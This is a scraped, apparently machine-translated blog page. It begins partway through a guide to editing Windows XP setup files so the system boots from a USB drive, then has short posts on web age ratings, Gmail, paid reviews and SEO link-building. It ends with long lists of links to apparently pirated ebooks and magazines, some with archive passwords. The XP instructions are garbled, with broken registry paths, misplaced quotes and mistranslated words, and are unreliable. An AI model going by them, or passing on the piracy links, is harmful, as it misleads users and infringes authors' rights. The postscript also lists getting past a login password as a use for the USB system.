usbehci = "Erweiterter Hostcontroller," files.usbehci, usbehci; insert this line
usbohci = "Open Hostcontroller," files.usbohci, usbohci; insert this line
usbuhci = "Universeller Hostcontroller," files.usbuhci, usbuhci; insert this line
usbhub = "Standard-USB-Hubtreiber," files.usbhub, usbhub; insert this line
usbstor = "USB-Speicherklassentreiber," files.usbstor, usbstor; insert this line

[InputDevicesSupport]
usbehci = "Erweiterter Hostcontroller," files.usbehci, usbehci; delete this line
usbohci = "Open Hostcontroller," files.usbohci, usbohci; delete this line
usbuhci = "Universeller Hostcontroller," files.usbuhci, usbuhci; delete this line
usbhub = "Standard-USB-Hubtreiber," files.usbhub, usbhub; delete this line
hidusb = "HID-parser," files.hidusb, hidusb
serial = "Treiber f? r seriellen Anschluss", files.none, serial
serenum = "f enumerators? r seriellen Anschluss", files.none, serenum
usbstor = "USB-Speicherklassentreiber," files.usbstor, usbstor; delete this line
usbccgp = "Generic USB Parent Driver", files.usbccgp, usbccgp

Some key Registry should be added and (again gives Microsoft the opportunity to make
to allow anyone) to modify the command files in TXTSETUP.SIF

[HiveInfs.Fresh]
AddReg = hivedef.inf, AddReg
AddReg = hivesys.inf, AddReg
AddReg = hivesft.inf, AddReg
AddReg = hivecls.inf, AddReg
AddReg = hiveusd.inf, AddReg
AddReg = dmreg.inf, DM.AddReg
AddReg = usbboot.inf, usbservices; insert this line

[SourceDisksFiles]
usbboot.inf = 1 ,,,,,,_ x, 3, 3; insert this line
bootvid.dll = 1 ,,,,,, 3_, 2,0,0,, 1.2
kdcom.dll = 1 ,,,,,, 3_, 2,0,0,, 1.2

Save and Close the file "TXTSETUP.SIF"

6-B) --- DOSNET.INF

Open the file and then do the editing DOSNET.INF as follows:

[Files]
d1, usbboot.inf; insert this line
d1, _default.pif
d1, 12520437.cpx
d1, 12520850.cpx

... and next, let alone

Save and Close the file "DOSNET.INF"

6-C) --- usb.inf

Make changes in the section [StandardHub.AddService] and [CommonClassParent.AddService]

[StandardHub.AddService]
DisplayName =%% StandardHub.SvcDesc
ServiceType = 1; SERVICE_KERNEL_DRIVER
StartType = 0; SERVICE_DEMAND_START; StartType be replaced StartType = 0
ErrorControl = 1; SERVICE_ERROR_NORMAL
ServiceBinary =% 12% \ usbhub.sys
LoadOrderGroup = Boot Bus Extender; add / change like this line

[CommonClassParent.AddService]
DisplayName =%% GenericParent.SvcDesc
ServiceType = 1; SERVICE_KERNEL_DRIVER
StartType = 0; SERVICE_DEMAND_START; StartType be replaced StartType = 0
ErrorControl = 1; SERVICE_ERROR_NORMAL
ServiceBinary =% 12% \ usbccgp.sys
LoadOrderGroup = Boot Bus Extender; add / change like this line

Save and Close the file "usb.inf"

6-E) --- usbstor.inf

Make changes in the section [USBSTOR.AddService]

[USBSTOR.AddService]
DisplayName =%% USBSTOR.SvcDesc
ServiceType = 1
StartType = 0; add / change like this line
Tag = 3; add / change like this line
ErrorControl = 1
ServiceBinary =% 12% \ USBSTOR.SYS
LoadOrderGroup = Boot Bus Extender; add / change like this line

Save and Close the file "usbstor.inf"

6-M) --- Create a file USBBOOT.INF

Create a file called "USBBOOT.INF" in the desktop%%

[usbservices]

HKLM, "SYSTEM \ CurrentControlSet \ Services \ USBSTOR", "DisplayName", 0x00000000, "USB Mass Storage Driver"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ USBSTOR", "ErrorControl", 0x00010001, 1
HKLM, "SYSTEM \ CurrentControlSet \ Services \ USBSTOR", "Group", 0x00000000, "System Reserved"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ USBSTOR", "ImagePath", 0x00020000, "system32 \ DRIVERS \ USBSTOR.SYS"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ USBSTOR," "Start", 0x00010001, 0
HKLM, "SYSTEM \ CurrentControlSet \ Services \ USBSTOR," "Type", 0x00010001, 1

HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbehci", "DisplayName", 0x00000000, "USB 2.0 Enhanced Host Controller Miniport Driver"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbehci", "ErrorControl", 0x00010001, 1
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbehci", "Group", 0x00000000, "System Reserved"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbehci", "ImagePath", 0x00020000, "system32 \ DRIVERS \ usbehci.sys"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbehci," "Start", 0x00010001, 0
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbehci," "Type", 0x00010001, 1

HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbhub", "DisplayName", 0x00000000, "USB2 Enabled Hub"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbhub", "ErrorControl", 0x00010001, 1
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbhub", "Group", 0x00000000, "System Reserved"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbhub", "ImagePath", 0x00020000, "system32 \ DRIVERS \ usbhub.sys"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbhub", "Start", 0x00010001, 0
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbhub", "Type", 0x00010001, 1

HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbuhci", "DisplayName", 0x00000000, "Microsoft USB Universal Host Controller Miniport Driver"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbuhci", "ErrorControl", 0x00010001, 1
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbuhci", "Group", 0x00000000, "System Reserved"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbuhci", "ImagePath", 0x00020000, "system32 \ DRIVERS \ usbuhci.sys"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbuhci," "Start", 0x00010001, 0
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbuhci," "Type", 0x00010001, 1

HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbohci", "DisplayName", 0x00000000, "Microsoft USB Open Host Controller Miniport Driver"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbohci", "ErrorControl", 0x00010001, 1
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbohci", "Group", 0x00000000, "System Reserved"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbohci", "ImagePath", 0x00020000, "system32 \ DRIVERS \ usbohci.sys"
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbohci," "Start", 0x00010001, 0
HKLM, "SYSTEM \ CurrentControlSet \ Services \ usbohci," "Type", 0x00010001, 1

Save and Close the file "USBBOOT.INF"

-------------------------------------------------- ---
Step 7: Packing files to the format Already Edited IN_
-------------------------------------------------- ---
Open another Command Prompt
C: \ Documents and Settings \% username% \ Desktop \>?

Type:

cabarc n USB.IN_ usb.inf
cabarc n USBPORT.IN_ usbport.inf
cabarc n USBSTOR.IN_ usbstor.inf

IN_ files dipaket is based on the file inf file that you edit the election.

-------------------------------------------------- ----------------
Step 8: Injeksikan files from the Desktop to IN_ "WinUSBDrive.ISO"
-------------------------------------------------- ----------------

Open UltraISO and make sure the (still) open the file "WinUSBDrive.ISO"

Open the folder \ i386 on "WinUSBDrive.ISO"

Delete the following files:

DOSNET.INF
TXTSETUP.SIF
USB.IN_
USBPORT.IN_
USBSTOR.IN_

Save the file "WinUSBDrive.ISO"

Drag-drop the files you have in the edit%% desktop was to "WinUSBDrive.ISO" in the folder \ i386

USBBOOT.INF
DOSNET.INF
TXTSETUP.SIF
USB.IN_
USBPORT.IN_
USBSTOR.IN_

Save the file "WinUSBDrive.ISO"

---------------------------------------
Step 9: Burning "WinUSBDrive.ISO" to CD
---------------------------------------
Burning with Nero or burnatonce with a low speed.

----------------------------------------
Step 10: Install Windows XP SP 2 from the CD
----------------------------------------
1. Shut down the computer.
2. Disconnect the internal and external hard drives
3. Set the BIOS to a USB Drive as a "first boot device"
4. Enter the USB drive without HUB (without cable, directly from the CPU to bring)
5. Restarting
Windows will usually display the error message:
1. "Drivers not certified" <- select YES.
This occurs because the files in the installation CD that already changed
2. "PageFile not found"
6. Install.

----------------------------
Step 11: Try This Everywhere
----------------------------
Once successful, the computer shutdown. Place the USB drive again. Try the house. ; op

Postscript:
-----------
Now you can use Flashdisk such as the operating system Windows XP SP 2.
Although not all motherboards support booting from a USB Drive ", at least, that can bring
run in the Pentium 4.
Of course you can understand why bring that can run Windows XP SP 2 is very helpful.
You can complete the "system errors" are common, such as:
1. Login password can not be opened
2. Virus lodged in the% SystemDrive% and must be cleaned
3. Want to copy files on hard drives, but the system error
4. Or do precisely contrary numbers 1, 2 and 3, namely: to accidentally delete a file in the Windows disk
can not booting, want an viruses, or files without the owner. p
5. About without fear of viruses or Trojan infected. Because, if infected, live format and hard drives
"reload" to bring to write "WinUSBDrive.ISO" to bring (about 10 minutes).

New..... Internet Site will be Age Ratings

Television ratings are installing age, and whether it's time Internet site also put the same thing?
According to the Daily Telegraph any posts, the results of interviews with British Minister of Culture, Andy Burnham, has a new standard morality should be applied in the virtual world. It is time to include the site or website rating age limit, up to 13 years, 17 years old and above, or for all ages. To that end, Burnham plans to negotiate with the government era of Barack Obama, to arrange international regulations on the site in English. Burnham added his side will ask the ISP to provide a safe for children. One way is with a rating in the age of each site.

"There is the actual content may not be seen, not intend to oppose the freedom to browse the site. For that, there must be a clear standard for the online world. Parents will be able to understand if they know there is a standard in the web site visited by their children and know what protection there is in it. "Burnham said.

Most likely, the regulations and censor Internet sites, will invite pro contra Advocate of a more happy with the freedom of expression on the Internet. "If you go back on the views of those who created the Internet, the fact they are talking about creating a space where there is no interference from the government. Therefore, the new regulation is appropriate, especially if the content, content site that is dangerous and copyrights. In addition, will also handle the problem of pollution as well as the name of both the world online. "Burnham said. Burnham added, now the UK government is considering to change the law so that the good name of the person will be able to get cheaper access to the Internet and file a claim if stained reputation online.
source : beritanet.com

Some weakness Gmail

Perhaps Google's Gmail service are very interesting in terms of the feature and also in terms of users was increasing, from the start constumisasi skin, to ease to track the email that has similarities theme. However, the Gmail service also has some shortages.

There is no menu drag and drop. Features drag and drop email has support in Yahoo, but not in Gmail. It seems simple, but essentially the user will be more pleased practical, rather than have me-check all the email and then select the folder when the other an email.

Delete feature. Indeed, there are keyboard shortcuts in Gmail, but for the deletion of email shortcut button not be used, that is, the "Delete" on the keyboard, even the "#".

Features label. Gmail does not provide a facility of making a new folder, but only a new label penberian in each email. This facility has a weakness that email will still remain in the box inbox.

Scan email. Gmail is doing scanning on all email inboxes, so Google can serve ads that are targeted. Therefore, the user can read other people, and the inbox can not do anything, considering that all the services from Gmail.

Static signature. Other email services are to provide facilities to make more than one signature to many email addresses. However, in the Gmail user must change the troublesome signature manually each a different email address.
source:beritainet.com

The debate Google Gmail and Internet Explorer

Google Inc. trying to encourage the user's email service Gmail to 'remove' Microsoft Corp.. Internet Explorer browser from Google Chrome or Mozilla Corp.. Firefox. When a user's browser Internet Explorer 6 to open Gmail.com, the user will get a message-based web services in the menu bar, named "Get faster Gmail". The message will be equipped with a link to a page that Google whiz-dengungkan that Chrome and Firefox 3 will run two times faster when run in Gmail.

Last week, the site also menampikan Gmail messages to Gmail users who browse with Microsoft Internet Explorer 7, but Google refused to give details of the message. Users who use other browsers, including Apple Inc. Safari and Opera Software ASA, has not show the message.

Google has also signed up IE7, Firefox 2.0, Chrome, and Safari browser as a support to Gmail. While other browsers, including Opera and the previous edition of IE, Firefox and Safari, can still be used to access the email service, but can not handle some other features.

Web metric Bedasarkan company, Net Applications Inc., more than 21 percent of users who browse the Internet months ago are still using IE6. While IE7 is used by more than 48 percent of users during the month of November, and Firefoc 3 third position with a value of 16 percent.

Google has aggressively since the Chrome browser is the first time the label appears in the early beta days ago. After that, such as drop Google as the default browser Firefox application in the Google Pack and add Chrome in the Google Pack.
source : beritanet.com

Monetizing abundant from SponsoredReviews

This is a short article about how you can make money only with abundant write whatever you want in your blog along with a program that is best paid review SponsoredReviews.

Paid review is a program which can make money by completing a review on a blog. So you are paid to write a review about a particular site or product.

Paid reviews are preferred by bloggers. If you do not have the capital or not want to buy a domain, it is quite just a free blog at blogger or wordpress, you can register in the program and get paid a review fee.

SponsoredReviews entry in the list of sites broker paid review the most popular among bloggers. Why so? Because the requirements to join in SponsoredReviews easier than the other sites paid review.

The system used in the commission SponsoredReviews based Percentage 65-35. The meaning is as a blogger you will receive 65% of the value of a review, while the remaining 35% to SponsoredReviews rights as the intermediary (broker). So, for example, you get the job review worth $ 100.

Now the value of the page you only get $ 65 only. Commission is paid once every 2 sunday through Paypal. Regardless of your commission, SponsoredReviews will still pay because they do not have the minimum that must be achieved.

Apart from the review commission, you will also get a commission through the affiliate program SponsoredReviews. When you promote SponsoredReviews on other people & join the page through your reference, the SponsoredReviews will provide a number of commissions for you.

How do I mereferensikan SponsoredReviews on other people?
SponsoredReviews as a member, you will get the affiliate link like this ..

http://www.sponsoredreviews.com/?aid=45060

Nah, you simply promote the use SponsoredReviews link above. In addition SponsoredReviews also provide some of the banner you can see in memberarea.
Some bloggers who have been successful earning abundant from SponsoredReviews:

Jacky Supit
Local players be regarded with great success SponsoredReviews. Bermodalkan PR 6 that he had, Jacky Supit the owner of this blog have been paid $ 1000 (thousand dollars) and $ 800 (eight hundred dollars), only 1 of the review course.

Indra diky
Indra diky players are paid reviews that have been recognized kehebatannya. As a blogger who play in the total paid review stage, he signed up more than 1 site broker. SponsoredReviews site, of course, one source dollarnya. How can total income? Blogger home Bandung never reveal this figure of $ 1000 - $ 3000 a month.

SEO Tips How To Increasing Link Popularity

Submitting to general purpose directories
On the Internet, many directories contain links to other network resources grouped by topics. The process of adding your site information to them is called submission. Such directories can be paid or free of charge, they may require a backlink from your site or they may have no such requirement. The number of visitors to these directories is not large so they will not send a significant number to your site. However, search engines count links from these directories and this may enhance your sites search result placement.

Important! Only those directories that publish a direct link to your site are worthwhile from a seo point of view. Script driven directories are almost useless. This point deserves a more detailed explanation. There are two methods for publishing a link. A direct link is published as a standard HTML construction. Alternatively, links can be published with the help of various scripts, redirects and so on. Search engines understand only those links that are specified directly in HTML code. That is why the seo value of a directory that does not publish a direct link to your site is close to zero.

You should not submit your site to FFA (free-for-all) directories. Such directories automatically publish links related to any search topic and are ignored by search engines. The only thing an FFA directory entry will give you is an increase in spam sent to your published e-mail address. Actually, this is the main purpose of FFA directories.

Be wary of promises from various programs and seo services that submit your resource to hundreds of thousands of search engines and directories. There are no more than a hundred or so genuinely useful directories on the Net – this is the number to take seriously and professional seo submission services work with this number of directories. If a seo service promises submissions to enormous numbers of resources, it simply means that the submission database mainly consists of FFA archives and other useless resources.

Give preference to manual or semiautomatic seo submission; do not rely completely on automatic processes. Submitting sites under human control is generally much more efficient than fully automatic submission. The value of submitting a site to paid directories or publishing a backlink should be considered individually for each directory. In most cases, it does not make much sense, but there may be exceptions.

Submitting sites to directories does not often result in a dramatic effect on site traffic, but it slightly increases the visibility of your site for search engines. This useful seo option is available to everyone and does not require a lot of time and expense, so do not overlook it when promoting your project.

DMOZ directory
The DMOZ directory (www.dmoz.org) or the Open Directory Project is the largest directory on the Internet. There are many copies of the main DMOZ site and so, if you submit your site to the DMOZ directory, you will get a valuable link from the directory itself as well as dozens of additional links from related resources. This means that the DMOZ directory is of great value to a seo aware webmaster.

It is not easy to get your site into the DMOZ directory; there is an element of luck involved. Your site may appear in the directory a few minutes after it has been submitted or it may take months to appear.

If you submitted your site details correctly and in the appropriate category then it should eventually appear. If it does not appear after a reasonable time then you can try contacting the editor of your category with a question about your request (the DMOZ site gives you such opportunity). Of course, there are no guarantees, but it may help. DMOZ directory submissions are free of charge for all sites, including commercial ones.

Here are my final recommendations regarding site submissions to DMOZ. Read all site requirements, descriptions, etc. to avoid violating the submission rules. Such a violation will most likely result in a refusal to consider your request. Please remember, presence in the DMOZ directory is desirable, but not obligatory. Do not despair if you fail to get into this directory. It is possible to reach top positions in search results without this directory – many sites do.

Link exchange
The essence of link exchanges is that you use a special page to publish links to other sites and get similar backlinks from them. Search engines do not like link exchanges because, in many cases, they distort search results and do not provide anything useful to Internet users. However, it is still an effective way to increase link popularity if you observe several simple rules.

Exchange links with sites that are related by topic. Exchanging links with unrelated sites is ineffective and unpopular.

Before exchanging, make sure that your link will be published on a “good” page. This means that the page must have a reasonable PageRank (3-4 or higher is recommended), it must be available for indexing by search engines, the link must be direct, the total number of links on the page must not exceed 50, and so on.

Do not create large link directories on your site. The idea of such a directory seems attractive because it gives you an opportunity to exchange links with many sites on various topics. You will have a topic category for each listed site. However, when trying to optimize your site you are looking for link quality rather than quantity and there are some potential pitfalls. No seo aware webmaster will publish a quality link to you if he receives a worthless link from your directory “link farm” in return. Generally, the PageRank of pages from such directories leaves a lot to be desired. In addition, search engines do not like these directories at all. There have even been cases where sites were banned for using such directories.

Use a separate page on the site for link exchanges. It must have a reasonable PageRank and it must be indexed by search engines, etc. Do not publish more than 50 links on one page (otherwise search engines may fail to take some of the links into account). This will help you to find other seo aware partners for link exchanges.

Search engines try to track mutual links. That is why you should, if possible, publish backlinks on a domain/site other than the one you are trying to promote. The best variant is when you promote the resource site1.com and publish backlinks on the resource site2.com

Exchange links with caution. Webmasters who are not quite honest will often remove your links from their resources after a while. Check your backlinks from time to time.

Press releases, news feeds, thematic resources
This section is about site marketing rather than pure seo. There are many information resources and news feeds that publish press releases and news on various topics. Such sites can supply you with direct visitors and also increase your sites popularity. If you do not find it easy to create a press release or a piece of news, hire copywriters – they will help you find or create something newsworthy.

Look for resources that deal with similar topics to your own site. You may find many Internet projects that not in direct competition with you, but which share the same topic as your site. Try to approach the site owners. It is quite possible that they will be glad to publish information about your project.

One final tip for obtaining inbound links – try to create slight variations in the inbound link text. If all inbound links to your site have exactly the same link text and there are many of them, the search engines may flag it as a spam attempt and penalize your site.

source : sampepuas.com

new free ebooks link

http://118.98.194.11/modul/
http://www.bisnisinvestasicerdas.com/bonus/
pass: sayainginsukses
http://www.saintpeter.sch.id/shs/sumarno/
http://www.jogjabelajar.org/download/
http://sragencommunity.info/download/
http://www.deluxeaccounting.com/download/
http://www.dapurbunda.com/dokumen/
http://abu.salma.web.id/ebooks/
http://www.sma-alirsyad-clp.sch.id/download/
http://repo.ugm.ac.id/ekstra/
http://eng.unri.ac.id/download/
http://www.litbang.depkes.go.id/download/
http://dl2.foss-id.web.id/
http://www.informatika.lipi.go.id/ign/
http://pestasains.ipb.ac.id/download/
http://lecturer.eepis-its.edu/~tessy/tutorial/
http://bebas.vlsm.org/v14/
http://kambing.ui.edu/bebas/v11/
http://www.ms.itb.ac.id/buku/
http://isi.stiki.ac.id/download/
http://www.jeparakab.go.id/jda/
http://www.respati.ac.id/download/
http://pub.garut.go.id/download_files/
http://bucex.org/downloads/
http://ndemoproduction.com/download/
http://www.kerjayaprosesdata.com/freedownload/
http://ilmukomputer.com/wp-content/uploads/
http://www.darminto.web.id/file/soal_ujian_cpns/
http://www.sanaky.com/materi/
http://ariyanti.freehostia.com/
http://mti.ugm.ac.id/~panji/dinus/
http://www.mti.ugm.ac.id/~adji/courses/
http://ikc.cbn.net.id/pengantar/
http://www.habibiecenter.or.id/download/
http://www.cs.ui.ac.id/WebKuliah/
http://gip.uniovi.es/gdiyad/docume/spss/pdf/
http://ict.pontianak.go.id/ebook/
http://debian.yaako.org/ebook/

Hacking Windows Vista:

http://rapidshare.com/files/130588517/HacngWidwsVita.rar
http://rapidshare.com/files/130512133/How_To_Make_People_Like_You_In_90_Seconds_Or_LessBy--RexY_tswarez.org.rar
Pass : tswarez.org
http://www.ziddu.com/download/1281999/III._Eclipse.pdf.html
http://rapidshare.com/files/101849846/Healthy_Aging_For_Dummies.rar
Beginning SQL Queries From Novice to Professional:
http://www.megaupload.com/?d=PLG5ZDST
http://rapidshare.com/files/90462278/Handbook.of.Database.Security.Applications.n.Trends-virTuAlZin.rar
Clare Churcher’s Beginning SQL Queries:
http://www.megaupload.com/?d=PLG5ZDST
http://rapidshare.com/files/114776659/HarryPotterBoxSet-Books1-7.rar
http://rapidshare.com/files/112694389/JavaPowerTools.rar
http://rapidshare.com/files/89624730/Linux.The.Complete.Reference.6th.Edition_Nov.2007_-virTuAlZin.rar
http://rapidshare.com/files/124384219/Premier.Press.Microsoft.Windows.XP.Professional.Administrators.Guide.rar
PC Magazine July 2008:
http://www.megaupload.com/?d=BJB1YP54
Pass : LiverpoolFC
Motor Trend Magazine, July 2008:
http://rapidshare.com/files/126966687/MotTrJul.rar
Adsense Advantage eBook:
http://rapidshare.com/files/123203311/AA.rar
What Google Never Told You About Making Money with AdSense:
http://rapidshare.com/files/56525910/GASJCEB.Lemon
http://rapidshare.com/files/124407043/Make.Easy.Money.with.Google.zip
http://rapidshare.com/files/125966715/Visual_Adobe_Photoshop_CS3_Top_100_Simplified_Tips_And_Tricks.rar
http://rapidshare.com/files/128982783/Adobe_Photoshop_Elements_6_Maximum_Performance.rar
Adobe Photoshop CS3 For Dummies:
http://rapidshare.com/files/126974262/IMG.rar
http://rapidshare.com/files/71744217/Microsoft.Office.Access.2007.The.Complete.Reference.rar
http://rapidshare.com/files/129111444/Wiley.Microsoft.Office.Excel.2007.Top.100.Simplified.Tips.and.Tricks.Jul.2007.pdf
http://rapidshare.com/files/114730163/NetworkingWithVista.rar
Microsoft Windows Vista Management and Administration: http://w13.easy-share.com/1700572293.html
http://rapidshare.com/files/123316948/IntroducAutoCAD.rar
http://rapidshare.com/files/116186145/AutoCAD2008ForDummies.rar
http://rapidshare.com/files/126056061/Sybex.Introducing.AutoCAD.2009.and.AutoCAD.LT.2009.May.2008.pdf
http://rapidshare.com/files/92852992/Spec.Ed.Using.MS.Win.Vista-virTuAlZin.rar
Adobe Photoshop CS Tips and Tricks From The Experts:
http://www.ziddu.com/downloadfile.php?uid=Y6%2BanJSpZaqZnZmlsKyZlJyiYq%2BWlpip2
http://rapidshare.com/files/107920521/asp_net_bible.pdf
100 books of Stephen King:
http://rapidshare.com/files/133011217/100ensk.rar
http://rapidshare.com/files/132929228/get-rid-of-my-gut.zip
http://rapidshare.com/files/132927747/brad-pilon-eat-stop-eat.zip
http://rapidshare.com/files/127690757/alwyn-cosgrove-afterburn-fat-loss.zip
http://rapidshare.com/files/127690758/alwyn-cosgrove-real-world-fat-loss.zip
300 Chicken Recipes:
http://www.ziddu.com/downloadfile.php?uid=Zaubl52tZLCelZynsayZlJyiY6%2BWlZyp3
Keep Your Brain Alive: 83 Neurobic Exercises:
http://www.ziddu.com/downloadfile.php?uid=aauil5yla7CblJzzaqqZnJGlbaebmp2tcQ%3D%3D8
Maximize Your Brain Power:
http://www.ziddu.com/downloadfile.php?uid=a62hlp2naq%2BfnOKnYqqhkZSqX6ydm5ym2
http://rapidshare.com/files/124380207/HTDAPM__Dominic_O_Brien__Quantum_Memory_Power.rar
http://rapidshare.com/files/127780530/steven-burns-survive-unbearable-stress.zip
http://rapidshare.com/files/127771726/will-brink-secrets-of-bodybuilding-revealed.zip
http://rapidshare.com/files/127715198/chris-aceto-fat-loss.zip
http://rapidshare.com/files/127769006/zach-even_esh-real-man-fitness.zip
http://rapidshare.com/files/127725031/charles-staley-unnatural-athlete.zip
http://rapidshare.com/files/127780527/dax-moy-the-magic-hundred.zip
http://rapidshare.com/files/127780528/kacper-postawski-powerful-sleep.zip
http://rapidshare.com/files/127780529/leo-babauta-zen-to-done.zip
http://rapidshare.com/files/127724569/mike-roussell-warp-speed-fat-loss.zip
http://rapidshare.com/files/14228644/da_vinci_code_bahasa_indonesia_.rar
http://rapidshare.com/files/128036442/No.Starch.Press.The.Art.Of.Assembly.Language.eBook-LiB.zip
http://rapidshare.com/files/127516043/For.Dummies.Web.Sites.Do.It.Yourself.For.Dummies.Feb.2008.eBook-BBL.rar
http://rapidshare.com/files/52643778/OReilly.Learning.Gnu.Emacs.3rd.Edition.Dec.2004.eBook-DDU.chm
http://rapidshare.com/files/6803782/McGraw.Hill.How.To.Do.Everything.with.Scanner.Second.Edition.eBook-DDU.pdf
http://rapidshare.com/files/51687305/ReallyUsefulEbooks.net_0596101511_OReilly.Network.Warrior.Jun.2007.eBook-BBL.pdf.rar
http://rapidshare.com/files/23931551/Wiley.Advanced.Cellular.Network.Planning.and.Optimisation.Jan.2007.eBook-BBL.rar-0470014717.rar
http://rapidshare.com/files/31741291/Manning.Ajax.in.Practice.Jun.2007.eBook-BBL.rar
http://rapidshare.com/files/48974319/Manning.ASP.NET.AJAX.in.Action.Aug.2007.eBook-BBL.rar
http://rapidshare.com/files/50288277/OReilly.Programming.Firefox.Apr.2007.eBook-BBL.rar
http://www.4shared.com/file/38783777/7300a87/40_Langkah_Mudah_Merakit_PC.html
http://rapidshare.com/files/127835048/Security_-_Google_Hacks.pdf.html
129 Teknik Profesional Photoshop CS3 http://rapidshare.com/files/115720755/cs3.rar
http://rapidshare.com/files/130801936/SAP_Human_Resources.rar
http://rapidshare.com/files/130801937/SAP_Project_System.rar
http://rapidshare.com/files/130808998/SAP_Financial_Acounting.rar
http://rapidshare.com/files/130808999/Sap_Plant_Maintenance.rar
http://rapidshare.com/files/130809000/SAP_Quality_Management.rar
http://rapidshare.com/files/130809001/SAP_Sales_and_Distribution.rar
http://rapidshare.com/files/130809002/SAp_Treasury_and_Cash_Management.rar
http://rapidshare.com/files/130809003/SAP_Warehouse_Management.rar
http://www.indowebster.com/AdvancedPhotoshopMagazineIssue_31.html
http://www.indowebster.com/AdvancedPhotoshopMagazineIssue_32.html
http://www.indowebster.com/AdvancedPhotoshopMagazineIssue41.html
http://www.indowebster.com/AdvancedPhotoshopMagazineIssue42.html
http://www.indowebster.com/FocalPressAdobePhotoshopCS3forPhotographersMay.html
http://www.indowebster.com/BlackandWhiteinPhotoshopCS3andPhotoshopLightroomAug2007.html
http://www.indowebster.com/CreativePhotoshopDigitalIllustrationandArtTechniquesJul2007.html
http://www.indowebster.com/FocalPressHowtoCheatinPhotoshopCS3May2007.html
http://www.indowebster.com/FocalPressPhotoshopCS3EssentialSkillsMay2007.html
http://www.indowebster.com/Mastering_AutoCAD_AutoCAD_LT_2008.html
http://www.indowebster.com/FocalPressTheAdobePhotoshopLayersBookJul2007.html
http://www.indowebster.com/PhotoshopCS3AllinOneDeskReferenceForDummiesMay2007.html
http://www.indowebster.com/AdobePhotoshopLightroomWorkflowApr2007.html
http://www.indowebster.com/MasteringPhotoshopCS3forPrintDesignandProductionJu2007.html
http://www.indowebster.com/PhotoshopCS3forForensicsProfessionalsJul2007.html
http://www.indowebster.com/PhotoshopCS3WorkflowMay2007.html
http://www.indowebster.com/PCMagazine07August2007.html
http://www.indowebster.com/PCMagazineApril102007.html
http://www.indowebster.com/PCMagazineApril2008.html
http://www.indowebster.com/PCMagazineAugust212007.html
http://www.indowebster.com/PCMagazineDecember252007.html
http://www.indowebster.com/PCMagazineJanuary2008.html
http://www.indowebster.com/PCMagazineJune52007.html
http://www.indowebster.com/PCMagazineJune2008.html
http://www.indowebster.com/PCMagazineMay82007.html
http://www.indowebster.com/PCMagazineMay2008.html
http://www.indowebster.com/PCMagazineNo042008.html
http://www.indowebster.com/PCMagazineOctober22007.html
http://www.indowebster.com/PCMagazineSep042007.html
http://www.indowebster.com/PCMagazineSeptember182007.html
http://www.indowebster.com/PCWorldApril2008.html
http://www.indowebster.com/PCWorldFebruary2008.html
http://www.indowebster.com/PCWorldJune2008.html
http://www.indowebster.com/PCWorldMarch2008.html
http://www.indowebster.com/PCWorldMay2008.html
http://www.indowebster.com/ComputerPowerUserCPUJuly2008.html
http://www.indowebster.com/ComputerPowerUserCPUJune2008.html
http://www.indowebster.com/ComputerPowerUserCPUMarch2008.html
http://www.indowebster.com/ComputerPowerUserApril2008.html
http://www.indowebster.com/ComputerPowerUserJanuary2008.html
http://www.indowebster.com/ComputerPowerUserMay2008.html
http://www.indowebster.com/ComputerPowerUserCPUDecember2007.html
http://www.indowebster.com/ComputerPowerUserCPUSeptember2007.html
http://www.indowebster.com/CPUComputerPowerUserAugust2007.html
http://www.indowebster.com/MaximumPCMagazineApril2008.html
http://www.indowebster.com/MaximumPCMagazineJanuary2008.html
http://www.indowebster.com/MaximumPCMagazineMarch2008.html
http://www.indowebster.com/MaximumPCOctober2008.html
http://www.indowebster.com/CiscoPressCiscoNetworkingSimplified2ndEditionJan2008.html
http://www.indowebster.com/CiscoPressInterconnectingCiscoNetworkDevicesPart2ICND2Feb2008.html
http://www.indowebster.com/CiscoPressRouterSecurityStrategiesJan2008.html
http://www.indowebster.com/CiscoPressSecurityMonitoringwithCiscoSecurityMARSJul2007.html
http://www.indowebster.com/SybexCCNACiscoCertifiedNetworkAssociateFastPass3rdEditionNov2007.html
http://www.indowebster.com/CiscoPressDeployingVoiceoverWirelessLANsMar2007.html
http://www.indowebster.com/PhotoshopCreativeIssue_1.html
http://www.indowebster.com/PhotoshopCreativeIssue_2.html
http://www.indowebster.com/PhotoshopCreativeIssue_3.html
http://www.indowebster.com/PhotoshopCreativeIssue_4.html
http://www.indowebster.com/PhotoshopCreativeIssue_5.html
http://www.indowebster.com/PhotoshopCreativeIssue_6.html
http://www.indowebster.com/PhotoshopCreativeIssue_7.html
http://www.indowebster.com/PhotoshopCreativeIssue_8.html
http://www.indowebster.com/PhotoshopCreativeIssue_9.html
http://www.indowebster.com/PhotoshopCreativeIssue_10.html
http://www.indowebster.com/PhotoshopCreativeIssue_11.html
http://www.indowebster.com/PhotoshopCreativeIssue_12.html
http://www.indowebster.com/PhotoshopCreativeIssue_13.html
http://www.indowebster.com/PhotoshopCreativeIssue_14.html
http://www.indowebster.com/PhotoshopCreativeIssue_15.html
http://www.indowebster.com/PhotoshopCreativeIssue_16.html
http://www.indowebster.com/PhotoshopCreativeIssue_17.html
http://www.indowebster.com/PhotoshopCreativeIssue_18.html
